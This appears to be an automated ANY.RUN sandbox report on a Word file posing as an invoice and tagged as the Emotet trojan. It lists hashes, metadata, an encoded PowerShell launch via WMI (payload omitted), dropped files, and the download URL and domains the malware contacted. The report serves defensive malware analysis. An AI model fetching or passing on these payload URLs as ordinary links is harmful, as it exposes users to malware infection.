File name: INVOICE_OW_34423.doc
Full analysis: https://app.any.run/tasks/09c58a4c-536b-4991-a049-f912899f4428
Verdict: Malicious activity
Threats:
Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 09, 2019, 14:21:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, generated-doc, emotet-doc, emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Investor, Subject: Practical Wooden Table, Author: Raymond Dibbert, Keywords: Functionality, Comments: Oman, Template: Normal.dotm, Last Saved By: Arianna Sawayn, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 8 22:22:00 2019, Last Saved Time/Date: Tue Oct 8 22:22:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 177, Security: 0
MD5: E85CC63F770351B4A8ABC0465EE11223
SHA1: B04290AC9A65425BB0278D604B7A3A4066278D15
SHA256: 98171CB786B90D72B9719F6A6FB80C5104FD3DD2AEEEEE5FFB386FA91091602E
SSDEEP: 6144:N57I3o9KUzSMnLx3EHBXyaBiG6EUqnUPse:N57I3oEUGMt3Eh7BiG6PXPs

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    No malicious indicators.
  • SUSPICIOUS
    • Creates files in the user directory
      • powershell.exe (PID: 2200)
    • Executed via WMI
      • powershell.exe (PID: 2200)
    • PowerShell script executed
      • powershell.exe (PID: 2200)
  • INFO
    • Creates files in the user directory
      • WINWORD.EXE (PID: 3312)
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 3312)
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Simonis
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 206
Paragraphs: 1
Lines: 1
Company: Gleason, Gislason and Gibson
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 177
Words: 30
Pages: 1
ModifyDate: 2019:10:08 21:22:00
CreateDate: 2019:10:08 21:22:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Arianna Sawayn
Template: Normal.dotm
Comments: Oman
Keywords: Functionality
Author: Raymond Dibbert
Subject: Practical Wooden Table
Title: Investor
No data.
Total processes: 37
Monitored processes: 2
Malicious processes: 0
Suspicious processes: 1

Behavior graph

Processes shown: start, winword.exe (no specs), powershell.exe

Process information

PID 3312: WINWORD.EXE
  CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\INVOICE_OW_34423.doc"
  Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  Parent process: explorer.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Microsoft Word
  Version: 14.0.6024.1000
PID 2200: powershell.exe
  CMD: powershell -enco [base64-encoded command omitted; see the full report]
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Parent process: wmiprvse.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Windows PowerShell
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 1 630
Read events: 1 130
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 0
Suspicious files: 2
Text files: 2
Unknown types: 17

Dropped files

PID   Process         Filename (type)
3312  WINWORD.EXE     C:\Users\admin\AppData\Local\Temp\CVRDFC.tmp.cvr
      MD5: -
      SHA256: -
2200  powershell.exe  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CGOKFTSNW76A5PJI46NZ.temp
      MD5: -
      SHA256: -
3312  WINWORD.EXE     C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4E3BA32E.wmf (wmf)
      MD5: D2EA8D23B13599A955476366EC421B69
      SHA256: 7E7B7C9913C6C3ADE74B9C32A3F56B4DFF89E7F8DA0827796B7025ED450B88B0
2200  powershell.exe  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1024a1.TMP (binary)
      MD5: 57F2BEBD8AB4D14DFF05F8F1EE1B1091
      SHA256: 24089794FD7207234A86BFD7344771ABD7A0BC15DCEB1A256EF927F010B65B1F
3312  WINWORD.EXE     C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\INVOICE_OW_34423.doc.LNK (lnk)
      MD5: 232BFDA2DB3227D8B0AA1A3D8A496CD1
      SHA256: B34533F447BC104CB6534D8A871C5543EE394C4EF5C845B3CAB99BB8F35CEDFA
3312  WINWORD.EXE     C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1DC2B246.wmf (wmf)
      MD5: 089B7464DB93FC0E3C76863ABD6DADB4
      SHA256: 34A6743403F07ECC24EB89572990F6B375A83ADCB6D77F354CEB7D7BC5C75873
3312  WINWORD.EXE     C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat (text)
      MD5: B56536BF9E38169CBF220B8EEA0608B7
      SHA256: 3423826254E9F7B9A495350D51344AF77193F3FE173E5895832E05ECD7A88851
3312  WINWORD.EXE     C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm (pgc)
      MD5: 2C233EA208BAE331A24427A029590B66
      SHA256: B9C9C93F06413758D91FEDEB037902B112BBDD223812DEA6E81DC2E5870D1E87
3312  WINWORD.EXE     C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E82CA76C.wmf (wmf)
      MD5: 2D0A3959940CDA264D880FDBAF145585
      SHA256: 75F604C7F17A8EC1EA7C747E41A254B96E1B0B26D7FF3887017AAEE68D8B9349
3312  WINWORD.EXE     C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A55EBC5A.wmf (wmf)
      MD5: 9B7D75AFA166F59B75A03F23425D1AB0
      SHA256: B930C6FFBFB0CFB5FDE8FE96E3B5B727C9C198CE3A4EDDD878C1261FE1DA7D08
HTTP(S) requests: 1
TCP/UDP connections: 7
DNS requests: 4
Threats: 0

HTTP requests

PID   Process         Method  HTTP Code  IP               URL                                                      CN  Type  Size  Reputation
2200  powershell.exe  GET     -          45.56.100.50:80  http://www.evextensions.com/wp-content/upgrade/ruyjko/  US  -     -     unknown

Connections

PID   Process         IP                  Domain                   ASN               CN  Reputation
2200  powershell.exe  198.71.233.68:443   quantumneurology.com     GoDaddy.com, LLC  US  suspicious
2200  powershell.exe  107.180.2.5:443     www.openwaterswimli.com  GoDaddy.com, LLC  US  unknown
2200  powershell.exe  45.56.100.50:80     www.evextensions.com     Linode, LLC       US  unknown
2200  powershell.exe  107.180.41.41:443   www.xuperweb.com         GoDaddy.com, LLC  US  unknown

DNS requests

Domain                   IP              Reputation
quantumneurology.com     198.71.233.68   suspicious
www.xuperweb.com         107.180.41.41   unknown
www.openwaterswimli.com  107.180.2.5     unknown
www.evextensions.com     45.56.100.50    unknown

Threats

No threats detected
No debug info